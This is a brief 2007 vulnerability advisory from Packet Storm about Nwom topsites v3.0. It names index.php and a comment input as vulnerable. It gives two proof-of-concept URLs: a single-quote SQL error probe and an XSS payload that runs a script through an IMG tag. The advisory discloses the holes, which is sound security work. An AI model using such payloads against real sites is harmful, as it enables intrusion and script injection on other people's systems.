nwomtopsites30-sql.txt

2007-01-14T00:00:00
ID PACKETSTORM:53622
Type packetstorm
Reporter Luny
Modified 2007-01-14T00:00:00

Description

                                        
                                            `Nwom topsites v3.0  
http://www.nwom.net  
  
Vulnerable files:  
  
Comment input.  
index.php  
  
SQL info released on error:  
http://www.example.com/index.php?o='  
  
XSS:  
http://www.example.com/index.php?o=<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>  
  
- Luny  
`